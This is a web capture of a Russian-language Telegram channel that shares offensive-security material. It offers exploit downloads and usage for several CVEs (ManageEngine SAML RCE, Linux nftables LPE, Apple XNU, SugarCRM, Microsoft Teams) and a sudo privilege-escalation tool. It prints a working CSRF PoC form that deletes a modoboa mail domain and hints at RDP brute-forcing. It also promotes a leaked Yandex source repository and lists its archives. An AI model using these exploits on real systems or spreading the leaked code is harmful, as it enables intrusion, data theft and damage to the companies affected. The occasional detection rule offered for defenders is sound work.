NEW BOT Телеграм, страница

Proxy Bar

CVE-2022-47966
*
Список ПО от ManageEngine подверженных атаке поражает !
*
Уязвимость позволяет удаленное выполнение кода, отправив HTTP-запрос POST, содержащий вредоносный ответ SAML. А всё из за не патченной версии Apache Santuario для проверки подписи XML.
*
read
*
POC/exploit
*
Usage:
python3 CVE-2022-47966.py --url https://10.0.40.64:8080/SamlResponseServlet --command notepad.exe

👍2🔥1

5.68K views14:43

Proxy Bar

Чаты и каналы Telegram по информационной безопасности 2023
Хорошая подборочка over 100, но нас в ней нет ((
Забираем

😱16

6.53K views16:23

Proxy Bar

SUDO KILLER
Тулза для выявления и использования неправильных конфигураций и уязвимостей правил sudo для повышения привилегий Linux.

download

👍10😱5

5.64K views18:50

Proxy Bar

Exploiting null-dereferences in the Linux kernel
Интересное

#linux #kernel

🔥5

5.16K views19:37

Proxy Bar

В продолжении темы
Появился nuclei-template для дыры CVE-2022-47966.yaml
Ну и сам nuclei забрать тут
****
Bonus для blueTeam - правило обнаружения эксплуатации дыры для Sigma - забрать

👍7🔥1

5.57K viewsedited 05:22

Proxy Bar

This media is not supported in your browser

VIEW IN TELEGRAM

Wolfenstein 3D CGA
Тут и описание то не нужно. забрать

#wolf #90

👍9🔥1😱1

5.12K views14:35

Proxy Bar

Если я пойду и долиною смертной тени, не убоюсь зла, потому что Ты со мной openAI;
Твой жезл и Твой посох - они успокаивают меня. Ты приготовил предо мною трапезу в виду врагов моих; умастил елеем голову мою; чаша моя преисполнена.

BOT off как вы поняли

😱16🔥1

5.11K viewsedited 17:03

Proxy Bar

RDP
Asynchronous RDP client for Python (headless)
*
Ну Вы понимаете, да ? )))
подобрать

👍7😱2🔥1

5.35K views05:34

Proxy Bar

Коннектимся!

👍13😱8🔥1

5.26K views08:15

Proxy Bar

Microsoft Teams - RCE
download

👍12

5.67K views11:11

Proxy Bar

CVE-2023-0179-linux_exploit.rar

9.7 KB

CVE-2023-0179 PoC
эксплойт для уязвимости в Nftables, затрагивающий все версии Linux от 5.5 до 6.2-rc3, хотя эксплойт тестировался на свежем ядре 6.1.6
Понять глубину

#linux #kernel #lpe #nftables

🔥2👍1

5.73K views13:17

Proxy Bar

переоформим !

😱10👍5

5.83K views13:38

Proxy Bar

CVE-2023-0398 modoboa - mail Server

CSRF приводит к удалению домена
*
usage fot BURP:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <noscript>history.pushState('', '', '/')</noscript>
    <form action="http://127.0.0.1:8000/admin/domains/4/delete/">
      <input type="submit" value="Submit request" />
    </form>
    <noscript>
      document.forms[0].submit();
    </noscript>
  </body>
</html>

read

🔥4👍3😱1

6.46K views09:13

Proxy Bar

SugarCRM 0-day Auth Bypass + RCE Exploit

🔥5😱2

6.38K views11:17

Proxy Bar

For BurpSuite
APIKit：Discovery, Scan and Audit APIs Toolkit All In One.
download

#Burp #plugins

😱5👍1

6.62K views11:45

Proxy Bar

Это может быть интересно
ADReplStatus
*
Active Directory Replication Status Tool, aka ADREPLSTATUS - 2023
download

😱4🔥2👍1

6.81K views12:19

Proxy Bar

LPE - Solaris 10
Злоупотребление в dtprintinfo
*
Есть такой ресёрчер Marco Ivaldi (дохлая корова) который шлепает сплоиты с бородатого 2000 года, хоть соляру сейчас найти сложно, но все равно красиво

exploit

👍10

6.3K views09:00

Proxy Bar

Фу, блин, Но POC есть POC
CVE-2023-22960
Обод механизма предотвращения подбора учетных данных встроенного веб-сервера (интерфейса) более чем 60 моделей принтеров Lexmark.
*
Фор Даунлоаде зысис щит, фолоу ту зэ линк, май френд

👍8🔥5😱2

6.14K views13:59

Proxy Bar

CVE-2023-23504.c

4.6 KB

CVE-2023-23504 - Apple products
*
Протекает dlil.c XNU который обрабатывает сетевые интерфейсы, вызванный целочисленным переполнением (uint16_t) в if.c. Всего лишь надо то создать 65536 сетевых интерфейсов.

🔥7👍4

6.11K views15:23

Proxy Bar

Yandex Git repository leaked
*
Несколько часов опубликовали 40Gb+ протекшего GIT-репозитория Яндекса.
а именно:

aapi.tar.bz2
admins.tar.bz2
ads.tar.bz2
alice.tar.bz2
analytics.tar.bz2
antiadblock.tar.bz2
antirobot.tar.bz2
autocheck.tar.bz2
balancer.tar.bz2
billing.tar.bz2
bindings.tar.bz2
captcha.tar.bz2
cdn.tar.bz2
certs.tar.bz2
ci.tar.bz2
classifieds.tar.bz2
client_analytics.tar.bz2
client_method.tar.bz2
cloud.tar.bz2
commerce.tar.bz2
connect.tar.bz2
crm.tar.bz2
crypta.tar.bz2
customer_service.tar.bz2
datacloud.tar.bz2
delivery.tar.bz2
direct.tar.bz2
disk.tar.bz2
docs.tar.bz2
drive.tar.bz2
extsearch.tar.bz2
fuzzing.tar.bz2
gencfg.tar.bz2
groups.tar.bz2
helpdesk.tar.bz2
infra.tar.bz2
intranet.tar.bz2
investors.tar.bz2
it-office.tar.bz2
jupytercloud.tar.bz2
kernel.tar.bz2
library.tar.bz2
load.tar.bz2
mail.tar.bz2
maps.tar.bz2
maps_2.tar.bz2
maps_adv.tar.bz2
market.tar.bz2
metrika.tar.bz2
mobile-WARNING-notfull.tar.bz2
nginx.tar.bz2
noc.tar.bz2
partner.tar.bz2
passport.tar.bz2
pay.tar.bz2
payplatform.tar.bz2
paysys.tar.bz2
portal.tar.bz2
robot.tar.bz2
rt-research.tar.bz2
saas.tar.bz2
sandbox.tar.bz2
search.tar.bz2
security.tar.bz2
skynet.tar.bz2
smart_devices.tar.bz2
smarttv.tar.bz2
solomon.tar.bz2
stocks.tar.bz2
tasklet.tar.bz2
taxi.tar.bz2
tools.tar.bz2
travel.tar.bz2
wmconsole.tar.bz2
yandex_io.tar.bz2
yandex360.tar.bz2
yaphone.tar.bz2
yawe.tar.bz2
frontend.tar.bz2

👍31😱15🔥6

9.98K views04:44

Proxy Bar

🔥24

7.73K views05:02

About

Blog

Apps

Platform